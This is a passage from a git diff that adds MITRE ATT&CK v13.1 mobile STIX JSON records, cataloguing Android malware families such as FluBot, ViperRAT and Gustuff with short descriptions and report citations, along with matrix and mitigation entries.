in late 2020. It primarily spread through European countries using a variety of SMS phishing messages in multiple languages.(Citation: proofpoint_flubot_0421)(Citation: bitdefender_flubot_0524)", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "FluBot" + ], + "type": "malware", + "id": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "created": "2023-02-28T20:25:59.034Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1067", + "external_id": "S1067" + }, + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + }, + { + "source_name": "bitdefender_flubot_0524", + "description": "Filip TRU\u021a\u0102, R\u0103zvan GOSA, Adrian Mihai GOZOB. (2022, May 24). New FluBot Campaign Sweeps through Europe Targeting Android and iOS Users Alike. Retrieved February 28, 2023.", + "url": "https://www.bitdefender.com/blog/labs/new-flubot-campaign-sweeps-through-europe-targeting-android-and-ios-users-alike/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json new file mode 100644 index 0000000000000000000000000000000000000000..12abe477957470785329cefc1a283c175be8c8ef --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f666e17c-b290-43b3-8947-b96bd5148fbb.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--80900544-0db5-49f8-93ae-b55f51ef2857", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "ViperRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "type": "malware", + "created": "2020-09-11T16:22:02.954Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0506", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0506" + }, + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-29T20:03:42.662Z", + "name": "ViperRAT", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) is sophisticated surveillanceware that has been in operation since at least 2015 and was used to target the Israeli Defense Force.(Citation: Lookout ViperRAT) ", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json new file mode 100644 index 0000000000000000000000000000000000000000..7a2ae16882dc36c7af55230f9b9408dbe4185eb3 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--c425f8c2-81a7-4a32-ad1a-b0aa254b2a63", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created": "2017-10-25T14:48:47.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json new file mode 100644 index 0000000000000000000000000000000000000000..503b886d05df23c214aac63a62a4f1329a461e9c --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f79c01eb-2954-40d8-a819-00b342f47ce7.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--901aeb88-7782-44de-bd8e-e037b0b9e31e", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "SimBad" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f79c01eb-2954-40d8-a819-00b342f47ce7", + "type": "malware", + "created": "2019-11-21T19:16:34.526Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0419", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0419" + }, + { + "description": "Elena Root, Andrey Polkovnichenko. (2019, March 13). SimBad: A Rogue Adware Campaign On Google Play. Retrieved November 21, 2019.", + "url": "https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/", + "source_name": "CheckPoint SimBad 2019" + } + ], + "modified": "2020-01-27T17:01:31.634Z", + "name": "SimBad", + "description": "[SimBad](https://attack.mitre.org/software/S0419) was a strain of adware on the Google Play Store, distributed through the RXDroider Software Development Kit. The name \"SimBad\" was derived from the fact that most of the infected applications were simulator games. The adware was controlled using an instance of the open source framework Parse Server.(Citation: CheckPoint SimBad 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json new file mode 100644 index 0000000000000000000000000000000000000000..67825a862b78939cfbe37175b66007ee7a5c1b31 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f7e7b736-2cff-4c2a-9232-352cd383463a.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--38a2f7aa-63c9-4826-acb9-ca14e9dc0a0f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "type": "malware", + "created": "2020-10-29T19:19:08.848Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0525", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T19:19:08.848Z", + "name": "Android/AdDisplay.Ashas", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json new file mode 100644 index 0000000000000000000000000000000000000000..2909f49509c918c5677efcf2bf9ffeaf54927816 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--f9854ba6-989d-43bf-828b-7240b8a65291.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--1a0a7a55-92dd-4a22-958c-67895909c532", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Marcher", + "description": "[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--f9854ba6-989d-43bf-828b-7240b8a65291", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0317", + "external_id": "S0317" + }, + { + "source_name": "Proofpoint-Marcher", + "description": "Proofpoint. (2017, November 3). Credential phishing and an Android banking Trojan combine in Austrian mobile attacks. Retrieved July 6, 2018.", + "url": "https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json new file mode 100644 index 0000000000000000000000000000000000000000..40949a2fda41f4bdb9add6b1894ecca43f6833b2 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--88766868-8743-4f63-9ebc-2b700500db46", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T21:11:14.364Z", + "name": "TianySpy", + "description": "[TianySpy](https://attack.mitre.org/software/S1056) is a mobile malware primarily spread by SMS phishing between September 30 and October 12, 2021. [TianySpy](https://attack.mitre.org/software/S1056) is believed to have targeted credentials associated with membership websites of major Japanese telecommunication services.(Citation: trendmicro_tianyspy_0122) ", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "TianySpy" + ], + "type": "malware", + "id": "malware--fd6d56b2-d84e-4d2a-b37d-d4678d3e08a6", + "created": "2023-01-19T18:05:30.924Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1056", + "external_id": "S1056" + }, + { + "source_name": "trendmicro_tianyspy_0122", + "description": "Trend Micro. (2022, January 25). TianySpy Malware Uses Smishing Disguised as Message From Telco. Retrieved January 11, 2023.", + "url": "https://www.trendmicro.com/en_us/research/22/a/tianyspy-malware-uses-smishing-disguised-as-message-from-telco.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json new file mode 100644 index 0000000000000000000000000000000000000000..542ecb8b41e0407218a927f7bc42096c7c169bf8 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--c4fed240-1a26-498f-a99d-262b353e498a", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)", + "labels": [ + "malware" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created": "2017-10-25T14:48:37.856Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json new file mode 100644 index 0000000000000000000000000000000000000000..d9987aa324177784a98e1e24b6fc17af1cad0a52 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/malware/malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--a575a2cd-8a18-4760-9605-4012abb89a98", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_aliases": [ + "Gustuff" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--ff8e0c38-be47-410f-a2d3-a3d24a87c617", + "type": "malware", + "created": "2019-09-03T20:08:00.241Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0406", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T19:14:17.007Z", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json b/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json new file mode 100644 index 0000000000000000000000000000000000000000..f640d09b37b55a546efe48a0e1493340e724c0e1 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/marking-definition/marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168.json @@ -0,0 +1,18 @@ +{ + "type": "bundle", + "id": "bundle--4523d20e-c390-45e6-81df-70917688e607", + "spec_version": "2.0", + "objects": [ + { + "definition": { + "statement": "Copyright 2015-2023, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation." + }, + "id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168", + "type": "marking-definition", + "created": "2017-06-01T00:00:00.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "definition_type": "statement", + "x_mitre_attack_spec_version": "2.1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json b/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json new file mode 100644 index 0000000000000000000000000000000000000000..33bd6ad6745f554b898db637e15053b000ff4cce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/mobile-attack.json @@ -0,0 +1,45463 @@ +{ + "type": "bundle", + "id": "bundle--eb94af3a-7838-4380-9f08-5d9142bc7b40", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--5104d5f0-16b7-4aec-8ae3-0a90cd5494fc", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Below are the tactics and techniques representing the two MITRE ATT&CK Matrices for Mobile. The Matrices cover techniques involving device access and network-based effects that can be used by adversaries without device access. The Matrices contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:44:04.736Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network-Based Effects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "tactic_refs": [ + "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "x-mitre-matrix", + "id": "x-mitre-matrix--a382db5e-d009-4135-b893-0e0ff021c95b", + "created": "2018-10-17T00:14:20.652Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "mobile-attack", + "url": "https://attack.mitre.org/matrices/mobile-attack" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Below are the tactics and technique representing the MITRE ATT&CK Matrix for Mobile. The Matrix contains information for the following platforms: Android, iOS.", + "modified": "2022-04-06T15:43:22.080Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Mobile ATT&CK", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "type": "course-of-action", + "created": "2017-10-25T14:48:51.657Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1006", + "external_id": "M1006" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Use Recent OS Version", + "description": "New mobile operating system versions bring not only patches against discovered vulnerabilities but also often bring security architecture improvements that provide resilience against potential vulnerabilities or weaknesses that have not yet been discovered. They may also bring improvements that block use of observed adversary techniques.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "course-of-action", + "id": "course-of-action--1553b156-6767-47f7-9eb4-2a692505666d", + "created": "2019-10-18T12:49:58.924Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1005", + "url": "https://attack.mitre.org/mitigations/M1005" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service.\n\nEnterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device.\n\nApplication Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.", + "modified": "2022-04-06T14:47:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Application Vetting", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.318Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "modified": "2020-06-24T15:08:18.395Z", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "type": "course-of-action", + "created": "2019-10-18T12:53:03.508Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1011", + "url": "https://attack.mitre.org/mitigations/M1011" + } + ], + "modified": "2019-10-18T15:51:48.318Z", + "name": "User Guidance", + "description": "Describes any guidance or training given to users to set particular configuration settings or avoid specific potentially risky behaviors.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "type": "course-of-action", + "created": "2017-10-25T14:48:52.270Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1004", + "external_id": "M1004" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "type": "course-of-action", + "created": "2017-10-25T14:48:50.769Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": 